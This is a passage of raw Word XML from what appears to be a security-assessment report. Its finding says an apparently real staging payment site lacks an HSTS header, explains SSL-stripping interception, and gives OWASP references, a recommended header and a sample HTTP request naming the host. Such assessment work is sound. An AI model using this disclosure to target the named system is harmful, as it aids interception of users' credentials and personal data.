              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">If a website accepts a connection through plain HTTP and redirects to HTTPS, visitors may initially communicate with the non-encrypted version of the site before being redirected, if, for example, the visitor types http://www.foo.com/ or even just foo.com. This creates an opportunity for a man-in-the-middle attack, giving the attacker an avenue to steal information being submitted in plain text. The redirect could be exploited to direct visitors to a malicious site instead of the secure version of the original site. An attacker can modify clear text traffic (HTTP) to replace links to encrypted application resources (HTTPS). When a modified link is loaded by a user, the attacker communicates with the web application via encrypted protocols (HTTPS) on behalf of the user while maintaining unencrypted (HTTP) </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>communication</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with the user. This technique is used to bypass the SSL certificate validation process and results in full disclosure of all information transmitted, including </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">usernames, password and any PHI, PII or sensitive information. This is mitigated by the strict enforcement of SSL by the application through HTTP Strict Transport Security header or HSTS header, which informs the browser that it should never load a site using HTTP and should automatically convert all attempts to access the site using HTTP to HTTPS requests instead. The first time a site is accessed using HTTPS and it returns the Strict-Transport-Security header, the browser records this information, so that, until the expiration time specified by the HSTS header elapses, any future attempts to load the site using HTTP will automatically use HTTPS instead.   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7062BB60" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">References:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16BB499D" w14:textId="3FB67AFE" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1. OWASP: HTTP Strict Transport Security  (</w:t>
            </w:r>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidR="008C11D3" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/HTTP_Strict_Transport_Security</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A03C9B4" w14:textId="0DA93366" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2. OWASP: Security Headers Project (</w:t>
            </w:r>
            <w:hyperlink r:id="rId35" w:anchor="tab=Headers" w:history="1">
              <w:r w:rsidR="008C11D3" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#tab=Headers</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E5DC4AC" w14:textId="40AB8197" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="008C11D3">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">3. OWASP HTTP Strict Transport Security </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cheat sheet</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidR="008C11D3" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1B2C9153" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5361ECCF"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lastRenderedPageBreak/>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EC6A7B3" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">In order to implement Strict Transport Security, ensure all application components uses HTTPS, in lieu of SSL mixed content (both HTTP and HTTPS). Utilize the below HTTP Strict Transport Security header (HSTS Header) on web servers, and ensure this header is present in all HTTP responses sent by application:   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="561C6A73" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Strict-Transport-Security: max-age=10886400; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>includeSubDomains</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; preload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7EAF50A6" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="17CFE4F0"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1D8E7F1E" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0506CC18" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B5FDB2" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="009A101C" w:rsidP="009A101C">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP request and response </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the application is not setting the HTTP Strict Transport Security (HSTS) h</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eader</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ED26637" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="009A101C" w:rsidRPr="00DB64A3" w14:paraId="3265A345" w14:textId="77777777" w:rsidTr="003305F7">
              <w:trPr>
                <w:trHeight w:val="1915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="58A80992" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>GET /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>sgofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/index.html</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="41840BB8" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="01C257FB" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="17B5EC43" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: text/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>html,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xhtml+xml,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xml;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.9,*/*;q=0.8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="39358309" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="54F0BFB1" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Encoding: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gzip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="32F6D7D2" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/gofundhip/</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="42C26A0E" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Cookie: </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="376B81F7" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="00354CEF" w14:textId="77777777" w:rsidR="009A101C" w:rsidRPr="00DB64A3" w:rsidRDefault="009A101C" w:rsidP="009A101C">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="009A101C" w:rsidRPr="00DB64A3" w14:paraId="317F40A2" w14:textId="77777777" w:rsidTr="003305F7">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
